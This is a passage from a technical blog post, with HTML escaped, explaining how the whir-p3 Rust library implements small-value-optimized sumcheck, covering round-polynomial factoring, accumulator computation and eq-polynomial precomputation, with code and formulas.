&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; --- THE SWITCHOVER: Fold polynomial with the 3 challenges ---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We fold to obtain p(r1, r2, r3, x).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut folded_evals = fold_evals_with_challenges(evals, &amp;amp;challenges);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; --- PHASE 2: Algorithm 5 for remaining rounds ---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    algorithm_5(prover_state, &amp;amp;mut folded_evals, w, &amp;amp;mut challenges, &amp;amp;mut sum, pow_bits);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let challenge_point = MultilinearPoint::new(challenges);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Final weight: eq(w, r)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let weights = EvaluationsList::new(vec![w.eq_poly(&amp;amp;challenge_point)]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let sumcheck = Self::new(folded_evals, weights, sum);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (sumcheck, challenge_point)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Let’s explain each phase in detail.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;iv-phase-1-the-first-three-rounds&quot;&gt;IV. Phase 1: The First Three Rounds&lt;&#x2F;h2&gt;
&lt;p&gt;The first three sumcheck rounds are implemented by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;whir-p3&#x2F;blob&#x2F;eec71d03a5ec81f30acc6d591f42f318941c6df5&#x2F;src&#x2F;sumcheck&#x2F;sumcheck_small_value.rs#L220&quot;&gt;&lt;code&gt;svo_three_rounds&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;. In each round $i$, the prover needs to:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Compute the univariate polynomial evaluations $S_i (0)$ and $S_i (\infty)$ (i.e., the leading coefficient).&lt;&#x2F;li&gt;
&lt;li&gt;Add these evaluations to the prover state.&lt;&#x2F;li&gt;
&lt;li&gt;Sample a new challenge $r_i$.&lt;&#x2F;li&gt;
&lt;li&gt;Fold the polynomial $p$.&lt;&#x2F;li&gt;
&lt;li&gt;Update the claimed sum $\sigma$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The only heavy step is the first one. We want the prover to compute $S_i$ efficiently. That is where SVO comes into play.&lt;&#x2F;p&gt;
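&lt;p&gt;As a baseline, the round loop above can be sketched end to end for a plain product of two multilinears (no eq-specialization or SVO; toy field, with fixed values standing in for the verifier’s random challenges):&lt;&#x2F;p&gt;

```rust
const P: u64 = 2_013_265_921; // BabyBear prime (illustrative choice)

fn mul(a: u64, b: u64) -> u64 { a * b % P }
fn add(a: u64, b: u64) -> u64 { (a + b) % P }
fn sub(a: u64, b: u64) -> u64 { (P + a - b) % P }

/// Fold out the first variable with challenge r.
fn fold(e: &[u64], r: u64) -> Vec<u64> {
    let h = e.len() / 2;
    (0..h).map(|i| add(mul(sub(1, r), e[i]), mul(r, e[h + i]))).collect()
}

/// Sumcheck for sigma = sum_x a(x)*b(x): each round the prover sends the
/// degree-2 polynomial S_i via {S_i(0), S_i(1), S_i(infinity)}, the
/// verifier checks S_i(0) + S_i(1) = sigma, samples r_i, and both sides
/// fold and update sigma <- S_i(r_i).
fn sumcheck(mut a: Vec<u64>, mut b: Vec<u64>, mut sigma: u64, rs: &[u64]) -> bool {
    for &r in rs {
        let h = a.len() / 2;
        let (mut s0, mut s1, mut s_inf) = (0u64, 0u64, 0u64);
        for i in 0..h {
            s0 = add(s0, mul(a[i], b[i])); // S(0)
            s1 = add(s1, mul(a[h + i], b[h + i])); // S(1)
            // leading coefficient: (a1 - a0)*(b1 - b0) per pair
            s_inf = add(s_inf, mul(sub(a[h + i], a[i]), sub(b[h + i], b[i])));
        }
        if add(s0, s1) != sigma {
            return false;
        }
        // S(r) for S(X) = s0 + c1*X + s_inf*X^2, with c1 = S(1) - S(0) - S(inf)
        let c1 = sub(sub(s1, s0), s_inf);
        sigma = add(add(s0, mul(c1, r)), mul(s_inf, mul(r, r)));
        a = fold(&a, r);
        b = fold(&b, r);
    }
    // Final check: sigma = a(r) * b(r) on the fully folded polynomials.
    sigma == mul(a[0], b[0])
}

fn main() {
    let a = vec![1, 2, 3, 4];
    let b = vec![5, 6, 7, 8];
    let sigma = a.iter().zip(&b).fold(0u64, |s, (&x, &y)| add(s, mul(x, y)));
    assert!(sumcheck(a, b, sigma, &[3, 7]));
}
```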
&lt;h3 id=&quot;factoring-the-univariate-round-polynomial&quot;&gt;Factoring the Univariate Round Polynomial&lt;&#x2F;h3&gt;
&lt;p&gt;Recall that the claimed sum we want to prove is:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\sigma = p(w) = \sum_{x \in \{0, 1\}^\ell} \mathrm{eq}(w, x) p(x).&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Then, for each round $i$, the prover needs to compute the univariate round polynomial $S_i (u)$ where:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
S_i(u) = \sum_{x \in \{0, 1\}^{\ell - i}} \mathrm{eq}\bigl(w; r_{[1, i - 1]}, u, x\bigr) \cdot p(r_{[1, i - 1]}, u, x).&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Splitting the eq-poly, we can factor $S_i$ in the following way, with $\ell_i$ the easy part and $t_i$ the heavy part:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
S_i(u) &amp;amp;= \ell_i(u) t_i(u), \newline&lt;br &#x2F;&gt;
\ell_i(u) &amp;amp;=&lt;br &#x2F;&gt;
\mathrm{eq}\bigl(w_{[1,i - 1]} ; r_{[1,i - 1]}\bigr)&lt;br &#x2F;&gt;
\mathrm{eq}(w_i; u), \newline&lt;br &#x2F;&gt;
t_i(u) &amp;amp;=&lt;br &#x2F;&gt;
\sum_{x \in \{0,1 \}^{\ell - i}}&lt;br &#x2F;&gt;
\mathrm{eq}\bigl(w_{[i+1,\ell]}; x\bigr)&lt;br &#x2F;&gt;
p(r_{[1,i - 1]}, u, x).&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;where:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$\ell_i(u)$ is the &lt;strong&gt;linear part&lt;&#x2F;strong&gt;: it comes from the eq-poly portion for variables $1$ to $i$. This is a linear polynomial in $u$ and is easy to compute.&lt;&#x2F;li&gt;
&lt;li&gt;$t_i(u)$ is the &lt;strong&gt;heavy part&lt;&#x2F;strong&gt;: it incorporates the sum over all remaining variables $x$ as well as the polynomial $p$. This is where all the complexity lives.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Note that computing $\ell_i (0)$ and $\ell_i(1)$ is essentially “free”, but computing $t_i(0)$ and $t_i(1)$ naively would require summing over exponentially many terms. That’s where &lt;strong&gt;accumulators&lt;&#x2F;strong&gt; come in.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;accumulator-computation-procedure-9&quot;&gt;Accumulator Computation (Procedure 9)&lt;&#x2F;h3&gt;
&lt;p&gt;The “heavy part” $t_i (u)$ is where SVO (&lt;em&gt;Algorithm 4&lt;&#x2F;em&gt;) and Eq-Poly (&lt;em&gt;Algorithm 5&lt;&#x2F;em&gt;) combine. We apply the Toom-Cook insight by using Lagrange interpolation on the challenges $r_{[1, i - 1]}$ and the sum-splitting insight on the remaining variables $x$.&lt;&#x2F;p&gt;
&lt;p&gt;This gives us the reformulation of $t_i(u)$ in terms of the precomputed accumulators $A_i(v, u)$:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
t_i(u) =&lt;br &#x2F;&gt;
\sum_{v \in \{0, 1\}^{i - 1}}&lt;br &#x2F;&gt;
L_v(r_{[1, i - 1]}) \cdot&lt;br &#x2F;&gt;
\underbrace{&lt;br &#x2F;&gt;
\left(&lt;br &#x2F;&gt;
\sum_{x_L} \mathrm{eq}(w_{[i + 1, \ell&#x2F;2]}; x_L)&lt;br &#x2F;&gt;
\sum_{x_R} \mathrm{eq}(w_{[\ell&#x2F;2 + 1, \ell]}; x_R)&lt;br &#x2F;&gt;
\cdot p(v, u, x_L, x_R)&lt;br &#x2F;&gt;
\right)&lt;br &#x2F;&gt;
}_{A_i(v, u)}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Here, $L_v$ is the Lagrange basis polynomial. This formula is the core of &lt;em&gt;Algorithm 6&lt;&#x2F;em&gt; ’s precomputation. The “how” of computing these $A_i(v,u)$ accumulators is &lt;em&gt;Procedure 9&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We can rewrite the inner part of the previous equation in the following way:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
A_i(v,u) =&lt;br &#x2F;&gt;
\sum_{y \in \{0,1\}^{\ell_0 - i}}&lt;br &#x2F;&gt;
\sum_{x_{\mathrm{out}} \in \{0,1\}^{\ell&#x2F;2 - \ell_0}}&lt;br &#x2F;&gt;
\mathrm{eq} \left(&lt;br &#x2F;&gt;
\left( w_{[(i + 1):\ell_0]}, w_{[(\ell&#x2F;2 + \ell_0+1):]} \right),&lt;br &#x2F;&gt;
(y, x_{\mathrm{out}})&lt;br &#x2F;&gt;
\right)&lt;br &#x2F;&gt;
\cdot \newline&lt;br &#x2F;&gt;
\sum_{x_{\mathrm{in}} \in \{0 , 1 \}^{ \ell&#x2F;2 }}&lt;br &#x2F;&gt;
\mathrm{eq} \left(&lt;br &#x2F;&gt;
w_{[(\ell_0+1):(\ell_0+\ell&#x2F;2)]}, x_{\mathrm{in}}&lt;br &#x2F;&gt;
\right)&lt;br &#x2F;&gt;
\cdot&lt;br &#x2F;&gt;
p \left( v, u, y, x_{\mathrm{in}}, x_{\mathrm{out}} \right)&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;In the paper, we can see that &lt;em&gt;Procedure 9&lt;&#x2F;em&gt; cleverly inverts the loops: instead of iterating by accumulator $A_i(v,u)$, it iterates over the data $(x_{\mathrm{out}}, x_{\mathrm{in}}, \beta)$ and “distributes” each result to the correct $A_i(v,u)$ bin. This is done in two stages:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;1. Temporal accumulation&lt;&#x2F;strong&gt; ($\mathrm{tA}[\beta]$): for a fixed $x_{\mathrm{out}}$, the algorithm computes the entire inner sum for every prefix $\beta \in \{0,1\}^{\ell_0}$. This loop contains the dominant 𝔰𝔩 operation: &lt;code&gt;e_in_value * poly_evals[index]&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\mathrm{tA}[\beta] =&lt;br &#x2F;&gt;
\sum_{x_{\mathrm{in}} \in \{0,1\}^{ \ell&#x2F;2}}&lt;br &#x2F;&gt;
E_{\mathrm{in}}[x_{\mathrm{in}}] \cdot&lt;br &#x2F;&gt;
p(\beta, x_{\mathrm{in}}, x_{\mathrm{out}})&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
E_{\mathrm{in}}[x_{\mathrm{in}}]&lt;br &#x2F;&gt;
=\mathrm{eq} \left(w_{[(\ell_0 + 1):(\ell_0 + \ell&#x2F;2)]}, x_{\mathrm{in}}\right)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2. Distribution&lt;&#x2F;strong&gt;: once the $\mathrm{tA}$ vector is computed, the algorithm “distributes” these values to the correct final accumulators $A_i(v,u)$, multiplying them by their respective $E_{\mathrm{out}}$ weights.&lt;&#x2F;p&gt;
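&lt;p&gt;The binning idea can be sketched for a single round with $u \in \{0,1\}$ and no $v$ prefix (toy field; names and shapes are illustrative, not the whir-p3 implementation): one pass over the data routes each weighted value to its accumulator, instead of one full scan per accumulator:&lt;&#x2F;p&gt;

```rust
const P: u64 = 97; // small illustrative prime field

fn mul(a: u64, b: u64) -> u64 { a * b % P }
fn add(a: u64, b: u64) -> u64 { (a + b) % P }

/// Single pass over the evaluations: each point's weighted value is
/// routed to the accumulator A(u) selected by its leading bit u.
/// `weights` plays the role of the precomputed eq table on the
/// remaining variables.
fn accumulate(evals: &[u64], weights: &[u64]) -> [u64; 2] {
    let half = evals.len() / 2;
    let mut bins = [0u64; 2];
    for (x, &v) in evals.iter().enumerate() {
        let u = x / half; // leading bit of x picks the bin
        bins[u] = add(bins[u], mul(weights[x % half], v));
    }
    bins
}

fn main() {
    // With uniform weights, bin 0 collects p(0, .) and bin 1 collects p(1, .).
    assert_eq!(accumulate(&[1, 2, 3, 4], &[1, 1]), [3, 7]);
}
```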
&lt;p&gt;Let’s dive into our implementation.&lt;&#x2F;p&gt;
&lt;p&gt;First, we have an &lt;code&gt;Accumulators&lt;&#x2F;code&gt; struct where we store the values, along with a couple of basic methods to create, modify, and read them:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[derive(Debug, Clone, Eq, PartialEq)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct Accumulators&amp;lt;F: Field&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; One accumulator vector per SVO round.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; - `accumulators[0]` has 2^1 = 2 elements for A_0(u)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; - `accumulators[1]` has 2^2 = 4 elements for A_1(v, u)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; - `accumulators[2]` has 2^3 = 8 elements for A_2(v, u)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub accumulators: [Vec&amp;lt;F&amp;gt;; NUM_SVO_ROUNDS],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl&amp;lt;F&amp;gt; Accumulators&amp;lt;F&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: Field,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    #[must_use]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub fn new_empty() -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; In round 0, we have 2 accumulators: A_0(u) with u in {0, 1}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; In round 1, we have 4 accumulators: A_1(v, u) with v in {0, 1} and u in {0, 1}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; In round 2, we have 8 accumulators: A_2(v, u) with v in {0, 1}^2 and u in {0, 1}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; We won&amp;#39;t need accumulators with any digit as infinity.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            accumulators: [F::zero_vec(2), F::zero_vec(4), F::zero_vec(8)],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; Adds a value to a specific accumulator.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub fn accumulate(&amp;amp;mut self, round: usize, index: usize, value: F) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        self.accumulators[round][index] += value;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; Gets the slice of accumulators for a given round.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    #[must_use]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub fn get_accumulators_for_round(&amp;amp;self, round: usize) -&amp;gt; &amp;amp;[F] {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;self.accumulators[round]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Notice that in the code we only compute accumulators for $u \in \{0,1\}$, even though $S(u)$ has degree 2 and would in principle require three evaluations: at $0$, $1$, and $\infty$. We’ll explain this later on.&lt;&#x2F;p&gt;
&lt;p&gt;So let’s see how we adapt &lt;em&gt;Procedure 9&lt;&#x2F;em&gt; to our specific use case.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Procedure 9. Page 37.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; We compute only the accumulators that we&amp;#39;ll use, that is,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; A_i(v, u) for i in {0, 1, 2}, v in {0, 1}^{i}, and u in {0, 1}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn compute_accumulators&amp;lt;F: Field, EF: ExtensionField&amp;lt;F&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    poly: &amp;amp;EvaluationsList&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    e_in: &amp;amp;[EF],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    e_out: &amp;amp;[Vec&amp;lt;EF&amp;gt;; NUM_SVO_ROUNDS],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Accumulators&amp;lt;EF&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The function receives as input the evaluations of $p(x)$, $E_{\mathrm{in}}$, and $E_{\mathrm{out}}$.&lt;&#x2F;p&gt;
&lt;p&gt;We can see in the paper that these are computed as follows:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
E_{\text{in}} := \left(\mathrm{eq} \left(&lt;br &#x2F;&gt;
w_{\left[\ell_0 + 1 : (\ell_0 + \ell&#x2F;2)\right]}, x_{\text{in}}&lt;br &#x2F;&gt;
\right) \right) \quad \text{with} \quad x_{\text{in}} \in \{0,1 \}^{\ell&#x2F;2}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
E_{\text{out},i} := \left( \mathrm{eq} \left(&lt;br &#x2F;&gt;
\left( w_{\left[(i+1):\ell_0\right]}, w_{\left[(\ell&#x2F;2+\ell_0+1):\right]} \right),&lt;br &#x2F;&gt;
(y, x_{\text{out}})&lt;br &#x2F;&gt;
\right)&lt;br &#x2F;&gt;
\right)\quad \text{with} \quad {(y, x_{ \text{out} }) \in \{0, 1\}^{ \ell_0 } \times \{0, 1 \}^{ \ell&#x2F;2 - \ell_0 }}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;These values depend only on our challenge $w$, so we can precompute them as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Precomputation needed for Procedure 9 (compute_accumulators).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Compute the evaluations eq(w_{l0 + 1}, ..., w_{l0 + l&#x2F;2} ; x) for all x in {0,1}^l&#x2F;2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn precompute_e_in&amp;lt;F: Field&amp;gt;(w: &amp;amp;MultilinearPoint&amp;lt;F&amp;gt;) -&amp;gt; Vec&amp;lt;F&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let half_l = w.num_variables() &#x2F; 2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let w_in = &amp;amp;w.0[NUM_SVO_ROUNDS..NUM_SVO_ROUNDS + half_l];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    eval_eq_in_hypercube(w_in)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Precomputation needed for Procedure 9 (compute_accumulators).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Compute three E_out vectors, one per round i in {0, 1, 2}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; For each i, E_out = eq(w_{i+1}, ..., l0, w_{l&#x2F;2 + l0 + 1}, ..., w_l ; x)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn precompute_e_out&amp;lt;F: Field&amp;gt;(w: &amp;amp;MultilinearPoint&amp;lt;F&amp;gt;) -&amp;gt; [Vec&amp;lt;F&amp;gt;; NUM_SVO_ROUNDS] {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let half_l = w.num_variables() &#x2F; 2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let w_out_len = w.num_variables() - half_l - 1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    std::array::from_fn(|round| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let mut w_out = Vec::with_capacity(w_out_len);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        w_out.extend_from_slice(&amp;amp;w.0[round + 1..NUM_SVO_ROUNDS]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        w_out.extend_from_slice(&amp;amp;w.0[half_l + NUM_SVO_ROUNDS..]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        eval_eq_in_hypercube(&amp;amp;w_out)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
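&lt;p&gt;Both precomputations lean on the helper &lt;code&gt;eval_eq_in_hypercube&lt;&#x2F;code&gt;, which expands a point $w$ into the $2^k$ evaluations of the eq polynomial over the hypercube. To make its behavior concrete, here is a minimal self-contained sketch; the toy prime modulus and the use of plain &lt;code&gt;u64&lt;&#x2F;code&gt; arithmetic instead of the repo’s &lt;code&gt;Field&lt;&#x2F;code&gt; trait are our simplifying assumptions, not the actual implementation:&lt;&#x2F;p&gt;

```rust
// Toy prime modulus standing in for the real field (assumption).
const P: u64 = 2013265921;

fn mul(a: u64, b: u64) -> u64 {
    ((a as u128 * b as u128) % P as u128) as u64
}

fn one_minus(a: u64) -> u64 {
    (1 + P - a) % P
}

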